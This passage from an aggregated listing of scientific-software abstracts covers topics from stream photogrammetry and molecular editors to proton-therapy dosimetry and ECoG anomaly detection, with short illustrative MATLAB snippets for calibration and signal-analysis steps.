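            state{k} = 'non-REM';                        % high delta/theta ratio
        elseif sigma(k)*theta(k) > stThr
            state{k} = 'transition-to-REM';              % high sigma x theta
        else
            state{k} = 'REM';
        end
    end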
Photogrammetric Method and Software for Stream Planform Identification
NASA Astrophysics Data System (ADS)
Stonedahl, S. H.; Stonedahl, F.; Lohberg, M. M.; Lusk, K.; Miller, D.
2013-12-01
Accurately characterizing the planform of a stream is important for many purposes, including recording measurement and sampling locations, monitoring change due to erosion or volumetric discharge, and spatial modeling of stream processes. While expensive surveying equipment or high resolution aerial photography can be used to obtain planform data, our research focused on developing a close-range photogrammetric method (and accompanying free/open-source software) to serve as a cost-effective alternative. This method involves securing and floating a wooden square frame on the stream surface at several locations, taking photographs from numerous angles at each location, and then post-processing and merging data from these photos using the corners of the square for reference points, unit scale, and perspective correction. For our test field site we chose a ~35 m reach along Black Hawk Creek in Sunderbruch Park (Davenport, IA), a small, slow-moving stream with overhanging trees. To quantify error we measured 88 distances between 30 marked control points along the reach. We calculated error by comparing these 'ground truth' distances to the corresponding distances extracted from our photogrammetric method. We placed the square at three locations along our reach and photographed it from multiple angles. The square corners, visible control points, and visible stream outline were hand-marked in these photos using the GIMP (open-source image editor). We wrote an open-source GUI in Java (hosted on GitHub), which allows the user to load marked-up photos, designate square corners and label control points. The GUI also extracts the marked pixel coordinates from the images. We also wrote several scripts (currently in MATLAB) that correct the pixel coordinates for radial distortion using Brown's lens distortion model, correct for perspective by forcing the four square corner pixels to form a parallelogram in 3-space, and rotate the points in order to correctly orient all photos of the same square location. Planform data from multiple photos (and multiple square locations) are combined using weighting functions that mitigate the error stemming from the markup process, imperfect camera calibration, etc. We have used our (beta) software to mark and process over 100 photos, yielding an average error of only 1.5% relative to our 88 measured lengths. Next we plan to translate the MATLAB scripts into Python and release their source code, at which point only free software, consumer-grade digital cameras, and inexpensive building materials will be needed for others to replicate this method at new field sites. (Figure: three sample photographs of the square with the created planform and control points.)
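For illustration, the radial-distortion step can be sketched in MATLAB using the first two radial terms of Brown's model; the coefficients, principal point and focal length below are placeholders, not the authors' calibration values:

    k1 = -0.12; k2 = 0.03;          % hypothetical radial distortion coefficients
    cx = 1024;  cy = 768;           % hypothetical principal point [pixels]
    f  = 2000;                      % hypothetical focal length [pixels]
    pix = [1500 400; 300 1200];     % measured (distorted) pixel coordinates
    xd = (pix(:,1) - cx) / f;       % normalised distorted coordinates
    yd = (pix(:,2) - cy) / f;
    xu = xd; yu = yd;               % fixed-point iteration to undistort
    for it = 1:20
        r2 = xu.^2 + yu.^2;
        s  = 1 + k1*r2 + k2*r2.^2;
        xu = xd ./ s;  yu = yd ./ s;
    end
    undistortedPix = [xu*f + cx, yu*f + cy];   % corrected pixel coordinates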
FlaME: Flash Molecular Editor - a 2D structure input tool for the web
2011-01-01
Background: So far, there have been no Flash-based web tools available for chemical structure input. The authors herein present a feasibility study, aiming at the development of a compact and easy-to-use 2D structure editor, using Adobe's Flash technology and its programming language, ActionScript. As a reference model application from the Java world, we selected the Java Molecular Editor (JME). In this feasibility study, we made an attempt to realize a subset of JME's functionality in the Flash Molecular Editor (FlaME) utility. These basic capabilities are: structure input, editing and depiction of single molecules, data import and export in molfile format. Implementation: The result of molecular diagram sketching in FlaME is accessible in V2000 molfile format. By integrating the molecular editor into a web page, its communication with the HTML elements on this page is established using the two JavaScript functions, getMol() and setMol(). In addition, structures can be copied to the system clipboard. Conclusion: A first attempt was made to create a compact single-file application for 2D molecular structure input/editing on the web, based on Flash technology. With the application examples presented in this article, it could be demonstrated that the Flash methods are principally well-suited to provide the requisite communication between the Flash object (application) and the HTML elements on a web page, using JavaScript functions. PMID:21284863
Visualization of protein sequence features using JavaScript and SVG with pViz.js.
Mukhyala, Kiran; Masselot, Alexandre
2014-12-01
pViz.js is a visualization library for displaying protein sequence features in a Web browser. By simply providing a sequence and the locations of its features, this lightweight, yet versatile, JavaScript library renders an interactive view of the protein features. Interactive exploration of protein sequence features over the Web is a common need in Bioinformatics. Although many Web sites have developed viewers to display these features, their implementations are usually focused on data from a specific source or use case. Some of these viewers can be adapted to fit other use cases but are not designed to be reusable. pViz makes it easy to display features as boxes aligned to a protein sequence with zooming functionality but also includes predefined renderings for secondary structure and post-translational modifications. The library is designed to further customize this view. We demonstrate such applications of pViz using two examples: a proteomic data visualization tool with an embedded viewer for displaying features on protein structure, and a tool to visualize the results of the variant_effect_predictor tool from Ensembl. pViz.js is a JavaScript library, available on github at https://github.com/Genentech/pviz. This site includes examples and functional applications, installation instructions and usage documentation. A Readme file, which explains how to use pViz with examples, is available as Supplementary Material A.
Dr.LiTHO: a development and research lithography simulator
NASA Astrophysics Data System (ADS)
Fühner, Tim; Schnattinger, Thomas; Ardelean, Gheorghe; Erdmann, Andreas
2007-03-01
This paper introduces Dr.LiTHO, a research- and development-oriented lithography simulation environment developed at Fraunhofer IISB to flexibly integrate our simulation models into one coherent platform. We propose a light-weight approach to a lithography simulation environment: the use of a scripting (batch) language as an integration platform. Out of the great variety of different scripting languages, Python proved superior in many ways: it has a gentle learning curve, it is efficient, it is available on virtually any platform, and it provides sophisticated integration mechanisms for existing programs. In this paper, we will describe the steps required to provide Python bindings for existing programs and finally to generate an integrated simulation environment. In addition, we will give a short introduction to selected software design demands associated with the development of such a framework. We will especially focus on testing and (both technical and user-oriented) documentation issues. Dr.LiTHO Python files contain not only all simulation parameter settings but also the simulation flow, providing maximum flexibility. In addition to relatively simple batch jobs, repetitive tasks can be pooled in libraries. And as Python is a full-blown programming language, users can add virtually any functionality, which is especially useful in the scope of simulation studies or optimization tasks that often require very large numbers of evaluations. Furthermore, we will give a short overview of the numerous existing Python packages. Several examples demonstrate the feasibility and productiveness of integrating Python packages into custom Dr.LiTHO scripts.
Cummings, Michael T.; Joh, Richard I.; Motamedi, Mo
2015-01-01
The fission (Schizosaccharomyces pombe) and budding (Saccharomyces cerevisiae) yeasts have served as excellent models for many seminal discoveries in eukaryotic biology. In these organisms, genes are deleted or tagged easily by transforming cells with PCR-generated DNA inserts, flanked by short (50-100 bp) regions of gene homology. These PCR reactions use specially designed long primers, which, in addition to the priming sites, carry homology for gene targeting. Primer design follows a fixed method but is tedious and time-consuming, especially when done for a large number of genes. To automate this process, we developed the Python-based Genome Retrieval Script (GRS), an easily customizable open-source script for genome analysis. Using GRS, we created PRIMED, the complete PRIMEr Database for deleting and C-terminal tagging genes in the main S. pombe and five of the most commonly used S. cerevisiae strains. Because of the importance of noncoding RNAs (ncRNAs) in many biological processes, we also included the deletion primer set for these features in each genome. PRIMED is accurate and comprehensive and is provided as downloadable Excel files, removing the need for future primer design, especially for large-scale functional analyses. Furthermore, the open-source GRS can be used broadly to retrieve genome information from custom or other annotated genomes, thus providing a suitable platform for building other genomic tools by the yeast or other research communities. PMID:25643023
NASA Technical Reports Server (NTRS)
OFarrell, Zachary L.
2013-01-01
The goal of this project is to create a website that displays video, a countdown clock, and event times to customers during launches, without needing to be connected to the internal operations network. A further requirement is to keep the delay in the clock and event data to less than two seconds. The two parts of this are the webpage, which will display the data and videos to the user, and a server to send clock and event data to the webpage. The webpage is written in HTML with CSS and JavaScript. The JavaScript is responsible for connecting to the server, receiving new clock data, and updating the webpage. JavaScript is used for this because it can send custom HTTP requests from the webpage and provides the ability to update parts of the webpage without having to refresh the entire page. The server application will act as a relay between the operations network and the open internet. On the operations network side, the application receives multicast packets that contain countdown clock and event data. It will then parse the data into current countdown times and events, and create a packet with that information that can be sent to webpages. The other part will accept HTTP requests from the webpage and respond to them with current data. The server is written in C# with some C++ files used to define the structure of data packets. The videos for the webpage will be shown in an embedded player from UStream.
Sauvage, Thomas; Plouviez, Sophie; Schmidt, William E; Fredericq, Suzanne
2018-03-05
The body of DNA sequence data lacking taxonomically informative sequence headers is rapidly growing in user and public databases (e.g. sequences lacking identification, and contaminants). In the context of systematics studies, sorting such sequence data for taxonomic curation and/or molecular diversity characterization (e.g. crypticism) often requires the building of exploratory phylogenetic trees with reference taxa. The subsequent step of segregating DNA sequences of interest based on observed topological relationships can represent a challenging task, especially for large datasets. We have written TREE2FASTA, a Perl script that enables and expedites the sorting of FASTA-formatted sequence data from exploratory phylogenetic trees. TREE2FASTA takes advantage of the interactive, rapid point-and-click color selection and/or annotation of tree leaves in the popular Java tree-viewer FigTree to segregate groups of FASTA sequences of interest into separate files. TREE2FASTA allows for both simple and nested segregation designs to facilitate the simultaneous preparation of multiple data sets that may overlap in sequence content.
Port-O-Sim Object Simulation Application
NASA Technical Reports Server (NTRS)
Lanzi, Raymond J.
2009-01-01
Port-O-Sim is a software application that supports engineering modeling and simulation of launch-range systems and subsystems, as well as the vehicles that operate on them. It is flexible, distributed, object-oriented, and real-time. A scripting language is used to configure an array of simulation objects and link them together. The script is contained in a text file, but executed and controlled using a graphical user interface. A set of modules is defined, each with input variables, output variables, and settings. These engineering models can either be linked to each other or run standalone. The settings can be modified during execution. Since 2001, this application has been used for pre-mission failure mode training for many Range Safety scenarios. It contains range asset link analysis, develops look-angle data, supports sky-screen site selection, drives GPS (Global Positioning System) and IMU (Inertial Measurement Unit) simulators, and can support conceptual design efforts for multiple flight programs with its capacity for rapid six-degrees-of-freedom model development.
XML-based scripting of multimodality image presentations in multidisciplinary clinical conferences
NASA Astrophysics Data System (ADS)
Ratib, Osman M.; Allada, Vivekanand; Dahlbom, Magdalena; Marcus, Phillip; Fine, Ian; Lapstra, Lorelle
2002-05-01
We developed a multi-modality image presentation software for display and analysis of images and related data from different imaging modalities. The software is part of a cardiac image review and presentation platform that supports integration of digital images and data from digital and analog media such as videotapes, analog x-ray films and 35 mm cine films. The software supports standard DICOM image files as well as AVI and PDF data formats. The system is integrated in a digital conferencing room that includes projections of digital and analog sources, remote videoconferencing capabilities, and an electronic whiteboard. The goal of this pilot project is to: 1) develop a new paradigm for image and data management for presentation in a clinically meaningful sequence adapted to case-specific scenarios, 2) design and implement a multi-modality review and conferencing workstation using component technology and customizable 'plug-in' architecture to support complex review and diagnostic tasks applicable to all cardiac imaging modalities and 3) develop an XML-based scripting model of image and data presentation for clinical review and decision making during routine clinical tasks and multidisciplinary clinical conferences.
HRMA calibration handbook: EKC gravity compensated XRCF models
NASA Technical Reports Server (NTRS)
Tananbaum, H. D.; Jerius, D.; Hughes, J.
1994-01-01
This document, consisting of hardcopy printout of explanatory text, figures, and tables, represents one incarnation of the AXAF high resolution mirror assembly (HRMA) Calibration Handbook. However, as we have envisioned it, the handbook also consists of electronic versions of this hardcopy printout (in the form of postscript files), the individual scripts which produced the various figures and the associated input data, the model raytrace files, and all scripts, parameter files, and input data necessary to generate the raytraces. These data are all available electronically as either ASCII or FITS files. The handbook is intended to be a living document and will be updated as new information and/or fabrication data on the HRMA are obtained, or when the need for additional results are indicated. The SAO Mission Support Team (MST) is developing a high fidelity HRMA model, consisting of analytical and numerical calculations, computer software, and databases of fundamental physical constants, laboratory measurements, configuration data, finite element models, AXAF assembly data, and so on. This model serves as the basis for the simulations presented in the handbook. The 'core' of the model is the raytrace package OSAC, which we have substantially modified and now refer to as SAOsac. One major structural modification to the software has been to utilize the UNIX binary pipe data transport mechanism for passing rays between program modules. This change has made it possible to simulate rays which are distributed randomly over the entrance aperture of the telescope. It has also resulted in a highly efficient system for tracing large numbers of rays. In one application to date (the analysis of VETA-I ring focus data) we have employed 2 x 10(exp 7) rays, a substantial improvement over the limit of 1 x 10(exp 4) rays in the original OSAC module. A second major modification is the manner in which SAOsac incorporates low spatial frequency surface errors into the geometric raytrace. The original OSAC included the ability to use Legendre-Fourier polynomials to describe deviations from the basic optical prescription. To this we have added bicubic splines to address a deficiency in the handling of the sharper deformations in the areas of mirror support pads. SAO has developed software (TRANS-FIT) to translate the most common finite element analysis models into these forms for incorporation into the raytrace program.
HRMA calibration handbook: EKC gravity compensated XRCF models
NASA Astrophysics Data System (ADS)
Tananbaum, H. D.; Jerius, D.; Hughes, J.
1994-06-01
This document, consisting of hardcopy printout of explanatory text, figures, and tables, represents one incarnation of the AXAF high resolution mirror assembly (HRMA) Calibration Handbook. However, as we have envisioned it, the handbook also consists of electronic versions of this hardcopy printout (in the form of postscript files), the individual scripts which produced the various figures and the associated input data, the model raytrace files, and all scripts, parameter files, and input data necessary to generate the raytraces. These data are all available electronically as either ASCII or FITS files. The handbook is intended to be a living document and will be updated as new information and/or fabrication data on the HRMA are obtained, or when the need for additional results are indicated. The SAO Mission Support Team (MST) is developing a high fidelity HRMA model, consisting of analytical and numerical calculations, computer software, and databases of fundamental physical constants, laboratory measurements, configuration data, finite element models, AXAF assembly data, and so on. This model serves as the basis for the simulations presented in the handbook. The 'core' of the model is the raytrace package OSAC, which we have substantially modified and now refer to as SAOsac. One major structural modification to the software has been to utilize the UNIX binary pipe data transport mechanism for passing rays between program modules. This change has made it possible to simulate rays which are distributed randomly over the entrance aperture of the telescope. It has also resulted in a highly efficient system for tracing large numbers of rays. In one application to date (the analysis of VETA-I ring focus data) we have employed 2 x 10^7 rays, a substantial improvement over the limit of 1 x 10^4 rays in the original OSAC module. A second major modification is the manner in which SAOsac incorporates low spatial frequency surface errors into the geometric raytrace. The original OSAC included the ability to use Legendre-Fourier polynomials to describe deviations from the basic optical prescription. To this we have added bicubic splines to address a deficiency in the handling of the sharper deformations in the areas of mirror support pads. SAO has developed software (TRANS-FIT) to translate the most common finite element analysis models into these forms for incorporation into the raytrace program.
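As a purely illustrative aside, a Legendre-Fourier deviation map of the kind used to describe mirror surface errors can be evaluated in a few lines of MATLAB (the coefficients are invented for the sketch and have nothing to do with the actual HRMA data):

    z   = linspace(-1, 1, 200);          % normalised axial coordinate
    phi = linspace(0, 2*pi, 360);        % azimuthal angle [rad]
    [Z, PHI] = meshgrid(z, phi);
    P2 = 0.5*(3*Z.^2 - 1);               % Legendre polynomial P2(z)
    P3 = 0.5*(5*Z.^3 - 3*Z);             % Legendre polynomial P3(z)
    dr = 0.8*P2 + 0.2*P3.*cos(2*PHI);    % hypothetical coefficients [micron]
    surf(Z, PHI, dr, 'EdgeColor', 'none');
    xlabel('axial'); ylabel('azimuth [rad]'); zlabel('surface deviation [micron]');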
Systematic approach to verification and validation: High explosive burn models
DOE Office of Scientific and Technical Information (OSTI.GOV)
Menikoff, Ralph; Scovel, Christina A.
2012-04-16
Most material models used in numerical simulations are based on heuristics and empirically calibrated to experimental data. For a specific model, key questions are determining its domain of applicability and assessing its relative merits compared to other models. Answering these questions should be a part of model verification and validation (V&V). Here, we focus on V&V of high explosive models. Typically, model developers implement their model in their own hydro code and use different sets of experiments to calibrate model parameters. Rarely can one find in the literature simulation results for different models of the same experiment. Consequently, it is difficult to assess objectively the relative merits of different models. This situation results in part from the fact that experimental data is scattered through the literature (articles in journals and conference proceedings) and that the printed literature does not allow the reader to obtain data from a figure in electronic form needed to make detailed comparisons among experiments and simulations. In addition, it is very time-consuming to set up and run simulations to compare different models over sufficiently many experiments to cover the range of phenomena of interest. The first difficulty could be overcome if the research community were to support an online web-based database. The second difficulty can be greatly reduced by automating procedures to set up and run simulations of similar types of experiments. Moreover, automated testing would be greatly facilitated if the data files obtained from a database were in a standard format that contained key experimental parameters as meta-data in a header to the data file. To illustrate our approach to V&V, we have developed a high explosive database (HED) at LANL. It now contains a large number of shock initiation experiments. Utilizing the header information in a data file from HED, we have written scripts to generate an input file for a hydro code, run a simulation, and generate a comparison plot showing simulated and experimental velocity gauge data. These scripts are then applied to several series of experiments and to several HE burn models. The same systematic approach is applicable to other types of material models; for example, equations of state models and material strength models.
Vcs.js - Visualization Control System for the Web
NASA Astrophysics Data System (ADS)
Chaudhary, A.; Lipsa, D.; Doutriaux, C.; Beezley, J. D.; Williams, D. N.; Fries, S.; Harris, M. B.
2016-12-01
VCS is a general purpose visualization library, optimized for climate data, which is part of the UV-CDAT system. It provides a Python API for drawing 2D plots such as line plots, scatter plots, Taylor diagrams, data colored by scalar values, vector glyphs, isocontours and map projections. VCS is based on the VTK library. Vcs.js is the corresponding JavaScript API, designed to be as close as possible to the original VCS Python API and to provide similar functionality for the Web. Vcs.js includes additional functionality when compared with VCS. This additional API is used to introspect data files available on the server and variables available in a data file. Vcs.js can display plots in the browser window. It always works with a server that reads a data file, extracts variables from the file and subsets the data. From this point, two alternate paths are possible. First, the system can render the data on the server using VCS, producing an image which is sent to the browser to be displayed. This path works for all plot types and produces a reference image identical to the images produced by VCS. This path uses the VTK-Web library. As an optimization, usable in certain conditions, a second path is possible. Data is packed and sent to the browser, which uses a JavaScript plotting library, such as plotly, to display the data. Plots that work well in the browser are line plots and scatter plots for any data, and many other plot types for small data and supported grid types. As web technology matures, more plots could be supported for rendering in the browser. Rendering can be done either on the client or on the server, and we expect that the best place to render will change depending on the available web technology, data transfer costs, server management costs and value provided to users. We intend to provide a flexible solution that allows for both client and server side rendering and a meaningful way to choose between the two. We provide a web-based user interface called vCdat which uses Vcs.js as its visualization library. Our paper will discuss the principles guiding our design choices for Vcs.js, present our design in detail and show a sample usage of the library.
Legato: Personal Computer Software for Analyzing Pressure-Sensitive Paint Data
NASA Technical Reports Server (NTRS)
Schairer, Edward T.
2001-01-01
'Legato' is personal computer software for analyzing radiometric pressure-sensitive paint (PSP) data. The software is written in the C programming language and executes under Windows 95/98/NT operating systems. It includes all operations normally required to convert pressure-paint image intensities to normalized pressure distributions mapped to physical coordinates of the test article. The program can analyze data from both single- and bi-luminophore paints and provides for both in situ and a priori paint calibration. In addition, there are functions for determining paint calibration coefficients from calibration-chamber data. The software is designed as a self-contained, interactive research tool that requires as input only the bare minimum of information needed to accomplish each function, e.g., images, model geometry, and paint calibration coefficients (for a priori calibration) or pressure-tap data (for in situ calibration). The program includes functions that can be used to generate needed model geometry files for simple model geometries (e.g., airfoils, trapezoidal wings, rotor blades) based on the model planform and airfoil section. All data files except images are in ASCII format and thus are easily created, read, and edited. The program does not use database files. This simplifies setup but makes the program inappropriate for analyzing massive amounts of data from production wind tunnels. Program output consists of Cartesian plots, false-colored real and virtual images, pressure distributions mapped to the surface of the model, assorted ASCII data files, and a text file of tabulated results. Graphical output is displayed on the computer screen and can be saved as publication-quality (PostScript) files.
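A hedged MATLAB sketch of an in situ calibration of the Stern-Volmer form commonly used for radiometric PSP (Iref/I = A + B*P/Pref) is shown below; it is not Legato source code, and the tap pressures and intensity ratios are synthetic:

    Pref   = 101.3;                                     % reference pressure [kPa]
    Ptap   = [60 75 90 101 110 120]';                   % pressure-tap readings [kPa]
    Iratio = 0.25 + 0.78*Ptap/Pref + 0.005*randn(6,1);  % synthetic wind-off/wind-on ratios at taps
    coeff  = [ones(size(Ptap)), Ptap/Pref] \ Iratio;    % least-squares fit of A and B
    A = coeff(1);  B = coeff(2);
    IratioImage = 0.25 + 0.78*rand(480, 640);           % placeholder ratio image
    Pmap = Pref * (IratioImage - A) / B;                % calibrated pressure field [kPa]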
PDBsum: Structural summaries of PDB entries.
Laskowski, Roman A; Jabłońska, Jagoda; Pravda, Lukáš; Vařeková, Radka Svobodová; Thornton, Janet M
2018-01-01
PDBsum is a web server providing structural information on the entries in the Protein Data Bank (PDB). The analyses are primarily image-based and include protein secondary structure, protein-ligand and protein-DNA interactions, PROCHECK analyses of structural quality, and many others. The 3D structures can be viewed interactively in RasMol, PyMOL, and a JavaScript viewer called 3Dmol.js. Users can upload their own PDB files and obtain a set of password-protected PDBsum analyses for each. The server is freely accessible to all at: http://www.ebi.ac.uk/pdbsum.
Hardware independence checkout software
NASA Technical Reports Server (NTRS)
Cameron, Barry W.; Helbig, H. R.
1990-01-01
ACSI has developed a program utilizing CLIPS to assess compliance with various programming standards. Essentially, the program parses C code to extract the names of all function calls. These are asserted as CLIPS facts, which also include information about line numbers, source file names, and called functions. Rules have been devised to identify called functions that have not been defined in any of the source parsed. These are compared against lists of standards (represented as facts) using rules that check intersections and/or unions of these lists. By piping the output into other processes, the source is appropriately commented by generating and executing parsed scripts.
A Platform-Independent Plugin for Navigating Online Radiology Cases.
Balkman, Jason D; Awan, Omer A
2016-06-01
Software methods that enable navigation of radiology cases on various digital platforms differ between handheld devices and desktop computers. This has resulted in poor compatibility of online radiology teaching files across mobile smartphones, tablets, and desktop computers. A standardized, platform-independent, or "agnostic" approach for presenting online radiology content was produced in this work by leveraging modern hypertext markup language (HTML) and JavaScript web software technology. We describe the design and evaluation of this software, demonstrate its use across multiple viewing platforms, and make it publicly available as a model for future development efforts.
NASA Astrophysics Data System (ADS)
Ma, Kevin; Wong, Jonathan; Zhong, Mark; Zhang, Jeff; Liu, Brent
2014-03-01
In the past, we have presented an imaging-informatics based eFolder system for managing and analyzing imaging and lesion data of multiple sclerosis (MS) patients, which allows for data storage, data analysis, and data mining in clinical and research settings. The system integrates the patient's clinical data with imaging studies and a computer-aided detection (CAD) algorithm for quantifying MS lesion volume, lesion contour, locations, and sizes in brain MRI studies. For compliance with IHE integration protocols, long-term storage in PACS, and data query and display in a DICOM compliant clinical setting, CAD results need to be converted into DICOM-Structured Report (SR) format. Open-source dcmtk and customized XML templates are used to convert quantitative MS CAD results from MATLAB to DICOM-SR format. A web-based GUI based on our existing web-accessible DICOM object (WADO) image viewer has been designed to display the CAD results from generated SR files. The GUI is able to parse DICOM-SR files and extract SR document data, then display lesion volume, location, and brain matter volume along with the referenced DICOM imaging study. In addition, the GUI supports lesion contour overlay, which matches a detected MS lesion with its corresponding DICOM-SR data when a user selects either the lesion or the data. The methodology of converting CAD data in native MATLAB format to DICOM-SR and displaying the tabulated DICOM-SR along with the patient's clinical information, and relevant study images in the GUI will be demonstrated. The developed SR conversion model and GUI support aim to further demonstrate how to incorporate CAD post-processing components in a PACS and imaging informatics-based environment.
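A schematic MATLAB fragment of this conversion path might fill a site-specific XML template with CAD results and then invoke dcmtk's xml2dsr command-line tool to produce the DICOM-SR object; the template file name and placeholder tags below are assumptions, not the authors' actual templates:

    lesionVolume_ml = 3.72;  lesionCount = 14;                        % example CAD outputs
    xml = fileread('ms_cad_sr_template.xml');                         % assumed local XML template
    xml = strrep(xml, '%%LESION_VOLUME%%', sprintf('%.2f', lesionVolume_ml));
    xml = strrep(xml, '%%LESION_COUNT%%',  sprintf('%d', lesionCount));
    fid = fopen('ms_cad_result.xml', 'w'); fprintf(fid, '%s', xml); fclose(fid);
    status = system('xml2dsr ms_cad_result.xml ms_cad_result.dcm');   % dcmtk XML-to-SR converter
    if status ~= 0, error('xml2dsr failed'); end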
Dosimetric investigation of proton therapy on CT-based patient data using Monte Carlo simulation
NASA Astrophysics Data System (ADS)
Chongsan, T.; Liamsuwan, T.; Tangboonduangjit, P.
2016-03-01
The aim of radiotherapy is to deliver a high radiation dose to the tumor with a low radiation dose to healthy tissues. Protons have Bragg peaks that give a high radiation dose to the tumor but a low exit dose or dose tail. Therefore, proton therapy is promising for treating deep-seated tumors and tumors located close to organs at risk. Moreover, the physical characteristics of protons are suitable for treating cancer in pediatric patients. This work developed a computational platform for calculating proton dose distributions using the Monte Carlo (MC) technique and the patient's anatomical data. The studied case is a pediatric patient with a primary brain tumor. PHITS will be used for the MC simulation. Therefore, patient-specific CT-DICOM files were converted to PHITS input. A MATLAB optimization program was developed to create a beam delivery control file for this study. The optimization program requires proton beam data. All these data were calculated in this work using analytical formulas, and the calculation accuracy was tested before the beam delivery control file was used for MC simulation. This study will be useful for researchers aiming to investigate proton dose distributions in patients but who do not have access to proton therapy machines.
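As a rough illustration of the kind of analytical beam data such an optimization program needs, the proton range in water can be estimated from the Bragg-Kleeman rule R = alpha*E^p (alpha ~ 0.0022 cm, p ~ 1.77 for water); this textbook approximation stands in for, and is not, the authors' beam model:

    E     = 70:10:230;                 % candidate proton energies [MeV]
    alpha = 0.0022;  p = 1.77;         % Bragg-Kleeman parameters for water
    R     = alpha * E.^p;              % range in water [cm]
    targetDepth = 12;                  % hypothetical target depth [cm]
    [~, idx] = min(abs(R - targetDepth));
    fprintf('use ~%d MeV (range %.1f cm)\n', E(idx), R(idx));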
EEGgui: a program used to detect electroencephalogram anomalies after traumatic brain injury.
Sick, Justin; Bray, Eric; Bregy, Amade; Dietrich, W Dalton; Bramlett, Helen M; Sick, Thomas
2013-05-21
Identifying and quantifying pathological changes in brain electrical activity is important for investigations of brain injury and neurological disease. An example is the development of epilepsy, a secondary consequence of traumatic brain injury. While certain epileptiform events can be identified visually from electroencephalographic (EEG) or electrocorticographic (ECoG) records, quantification of these pathological events has proved to be more difficult. In this study we developed MATLAB-based software to assist detection of pathological brain electrical activity following traumatic brain injury (TBI), and we present our MATLAB code used for the analysis of the ECoG. The software was developed using MATLAB(™) and features of the open-access EEGLAB. EEGgui is a graphical user interface in the MATLAB programming platform that allows scientists who are not proficient in computer programming to perform a number of elaborate analyses on ECoG signals. The different analyses include Power Spectral Density (PSD), Short-Time Fourier analysis and Spectral Entropy (SE). ECoG records used for demonstration of this software were derived from rats that had undergone traumatic brain injury one year earlier. The software provided in this report provides a graphical user interface for displaying ECoG activity and calculating normalized power density using the fast Fourier transform of the major brain wave frequencies (Delta, Theta, Alpha, Beta1, Beta2 and Gamma). The software further detects events in which the power density for these frequency bands exceeds normal ECoG by more than 4 standard deviations. We found that epileptic events could be identified and distinguished from a variety of ECoG phenomena associated with normal changes in behavior. We further found that analysis of spectral entropy was less effective in distinguishing epileptic from normal changes in ECoG activity. The software presented here is a successful modification of EEGLAB in the MATLAB environment that allows detection of epileptiform ECoG signals in animals after TBI. The code allows import of large EEG or ECoG data records as standard text files and uses the fast Fourier transform as a basis for detection of abnormal events. The software can also be used to monitor injury-induced changes in spectral entropy if required. We hope that the software will be useful for other investigators in the field of traumatic brain injury and will stimulate future advances in quantitative analysis of brain electrical activity after neurological injury or disease.
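A minimal MATLAB sketch of the band-power and exceedance test described above (not the EEGgui source; the recording below is white noise standing in for an ECoG channel):

    fs = 1000;  x = randn(1, 60*fs);                 % placeholder 60-s recording at 1 kHz
    epochLen = fs;  nEp = floor(numel(x)/epochLen);  % 1-s epochs
    w  = 0.5 - 0.5*cos(2*pi*(0:epochLen-1)/(epochLen-1));   % Hann window
    f  = (0:epochLen/2-1) * fs / epochLen;           % frequency axis [Hz]
    deltaPower = zeros(1, nEp);
    for k = 1:nEp
        seg = x((k-1)*epochLen + (1:epochLen));
        X   = fft(seg .* w);                         % windowed FFT
        psd = abs(X(1:epochLen/2)).^2;               % one-sided power spectrum
        deltaPower(k) = sum(psd(f >= 1 & f < 4));    % delta band (1-4 Hz) power
    end
    events = find(deltaPower > mean(deltaPower) + 4*std(deltaPower));  % >4 SD exceedances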